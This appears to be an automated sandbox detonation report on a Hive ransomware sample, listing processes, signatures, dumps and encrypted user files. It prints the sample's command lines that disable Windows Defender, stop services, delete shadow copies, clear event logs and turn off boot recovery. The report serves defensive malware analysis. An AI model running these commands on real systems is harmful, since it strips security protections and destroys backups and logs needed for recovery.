PID 1480 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 4416 wrote to memory of 4316 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4416 wrote to memory of 4316 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 4300 wrote to memory of 3324 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4300 wrote to memory of 3324 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 3888 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 3888 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 3888 wrote to memory of 3656 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3888 wrote to memory of 3656 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12c39" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12c39" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12c39" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Files

memory/3812-115-0x0000000000000000-mapping.dmp

memory/3708-116-0x0000000000000000-mapping.dmp

memory/4128-117-0x0000000000000000-mapping.dmp

memory/3036-118-0x0000000000000000-mapping.dmp

memory/692-119-0x0000000000000000-mapping.dmp

memory/3500-120-0x0000000000000000-mapping.dmp

memory/4072-121-0x0000000000000000-mapping.dmp

memory/8-122-0x0000000000000000-mapping.dmp

memory/4276-123-0x0000000000000000-mapping.dmp

memory/4228-124-0x0000000000000000-mapping.dmp

memory/4216-125-0x0000000000000000-mapping.dmp

memory/4356-126-0x0000000000000000-mapping.dmp

memory/4416-127-0x0000000000000000-mapping.dmp

memory/4316-128-0x0000000000000000-mapping.dmp

memory/4300-129-0x0000000000000000-mapping.dmp

memory/3324-130-0x0000000000000000-mapping.dmp

memory/3888-131-0x0000000000000000-mapping.dmp

memory/3656-132-0x0000000000000000-mapping.dmp

memory/3192-133-0x0000000000000000-mapping.dmp

memory/524-134-0x0000000000000000-mapping.dmp

memory/644-135-0x0000000000000000-mapping.dmp

memory/908-136-0x0000000000000000-mapping.dmp

memory/1068-137-0x0000000000000000-mapping.dmp

memory/1228-138-0x0000000000000000-mapping.dmp

memory/1448-139-0x0000000000000000-mapping.dmp

memory/1632-140-0x0000000000000000-mapping.dmp

memory/1896-141-0x0000000000000000-mapping.dmp

memory/1808-142-0x0000000000000000-mapping.dmp

memory/2340-143-0x0000000000000000-mapping.dmp

memory/2576-144-0x0000000000000000-mapping.dmp

memory/3256-145-0x0000000000000000-mapping.dmp

memory/3088-146-0x0000000000000000-mapping.dmp

memory/3232-147-0x0000000000000000-mapping.dmp

memory/4828-148-0x0000000000000000-mapping.dmp

memory/1196-149-0x0000000000000000-mapping.dmp

memory/1372-150-0x0000000000000000-mapping.dmp

memory/2968-151-0x0000000000000000-mapping.dmp

memory/4900-152-0x0000000000000000-mapping.dmp

memory/4592-153-0x0000000000000000-mapping.dmp

memory/4752-154-0x0000000000000000-mapping.dmp

memory/3016-155-0x0000000000000000-mapping.dmp

memory/2888-156-0x0000000000000000-mapping.dmp

memory/5064-157-0x0000000000000000-mapping.dmp

memory/5008-158-0x0000000000000000-mapping.dmp

memory/700-159-0x0000000000000000-mapping.dmp

memory/1176-160-0x0000000000000000-mapping.dmp

memory/4904-161-0x0000000000000000-mapping.dmp

memory/2008-162-0x0000000000000000-mapping.dmp

memory/2208-163-0x0000000000000000-mapping.dmp

memory/4508-164-0x0000000000000000-mapping.dmp

memory/1332-165-0x0000000000000000-mapping.dmp

memory/1572-166-0x0000000000000000-mapping.dmp

memory/1712-167-0x0000000000000000-mapping.dmp

memory/2104-168-0x0000000000000000-mapping.dmp

memory/4808-169-0x0000000000000000-mapping.dmp

memory/2304-170-0x0000000000000000-mapping.dmp

memory/2988-171-0x0000000000000000-mapping.dmp

memory/3628-172-0x0000000000000000-mapping.dmp

memory/4688-173-0x0000000000000000-mapping.dmp

memory/3756-174-0x0000000000000000-mapping.dmp

memory/3772-175-0x0000000000000000-mapping.dmp

memory/2176-176-0x0000000000000000-mapping.dmp

memory/4036-177-0x0000000000000000-mapping.dmp

memory/4100-178-0x0000000000000000-mapping.dmp

memory/3040-179-0x0000022B0DB30000-0x0000022B0DB32000-memory.dmp

memory/3040-180-0x0000022B0DB30000-0x0000022B0DB32000-memory.dmp

memory/3040-181-0x0000022B0DB30000-0x0000022B0DB32000-memory.dmp

memory/3040-182-0x0000022B0DB30000-0x0000022B0DB32000-memory.dmp

memory/3040-183-0x0000022B26270000-0x0000022B26292000-memory.dmp

memory/3040-184-0x0000022B0DB30000-0x0000022B0DB32000-memory.dmp

memory/3040-185-0x0000022B0DB30000-0x0000022B0DB32000-memory.dmp

memory/3040-186-0x0000022B267C0000-0x0000022B26836000-memory.dmp

memory/3040-187-0x0000022B0DB30000-0x0000022B0DB32000-memory.dmp

memory/3040-191-0x0000022B262C0000-0x0000022B262C2000-memory.dmp

memory/3040-192-0x0000022B262C3000-0x0000022B262C5000-memory.dmp

memory/3040-213-0x0000022B262C6000-0x0000022B262C8000-memory.dmp

memory/3040-214-0x0000022B0DB30000-0x0000022B0DB32000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/1780-216-0x000002BF247D0000-0x000002BF247D2000-memory.dmp

memory/1780-217-0x000002BF247D0000-0x000002BF247D2000-memory.dmp

memory/1780-218-0x000002BF247D0000-0x000002BF247D2000-memory.dmp

memory/1780-219-0x000002BF247D0000-0x000002BF247D2000-memory.dmp

memory/1780-220-0x000002BF3CF40000-0x000002BF3CF62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0bd87eabcff428ea3b433872afd92c8a
SHA1 3ea62c689c6c031b551d809f8c90b90d0a0f1850
SHA256 4e8960621d6ffdc02b3aca8719835cb11b98ef21e930b63916f43d306d7ee505
SHA512 20d59eacc3b6e579294d855e8a2c58911a2a5d1603ae218d0b693a3ee42a166b31555eb51e616d06ba64c1a1d28377d029979a096e812478fd93e865e4e0c49e

memory/1780-222-0x000002BF247D0000-0x000002BF247D2000-memory.dmp

memory/1780-223-0x000002BF247D0000-0x000002BF247D2000-memory.dmp

memory/1780-224-0x000002BF3D460000-0x000002BF3D4D6000-memory.dmp

memory/1780-225-0x000002BF247D0000-0x000002BF247D2000-memory.dmp

memory/3040-229-0x0000022B262C8000-0x0000022B262C9000-memory.dmp

memory/1780-230-0x000002BF3CEC0000-0x000002BF3CEC2000-memory.dmp

memory/1780-233-0x000002BF3CEC3000-0x000002BF3CEC5000-memory.dmp

memory/1780-234-0x000002BF3CEC6000-0x000002BF3CEC8000-memory.dmp

memory/1780-253-0x000002BF247D0000-0x000002BF247D2000-memory.dmp

memory/1780-254-0x000002BF3CEC8000-0x000002BF3CEC9000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 20:48

Reported

2022-01-12 20:53

Platform

win7-en-20211208

Max time kernel

133s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\MountCopy.png.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_ibd2RbKHgpA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\ProtectRedo.tiff.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_Rc47Lo2Ao500.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\UnprotectReset.crw => C:\Users\Admin\Pictures\UnprotectReset.crw.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_WDwP10GWZx80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseInstall.png.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_EcYdAi59bNc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\CheckpointPush.tif => C:\Users\Admin\Pictures\CheckpointPush.tif.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_I5tD0wsAfNA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\CheckpointPush.tif.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_I5tD0wsAfNA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\GroupAssert.crw => C:\Users\Admin\Pictures\GroupAssert.crw.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_5LaqSpALKo00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnprotectReset.crw.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_WDwP10GWZx80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\UseInstall.png => C:\Users\Admin\Pictures\UseInstall.png.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_EcYdAi59bNc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\GroupAssert.crw.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_5LaqSpALKo00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\MountCopy.png => C:\Users\Admin\Pictures\MountCopy.png.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_ibd2RbKHgpA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\ProtectRedo.tiff => C:\Users\Admin\Pictures\ProtectRedo.tiff.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_Rc47Lo2Ao500.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_x15BasrXYN40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_RjZ817X5tE80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\PREVIEW.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_MhUe8we7lts0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Adjacency.thmx.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_1_F5tswa1Vw0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\glow.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
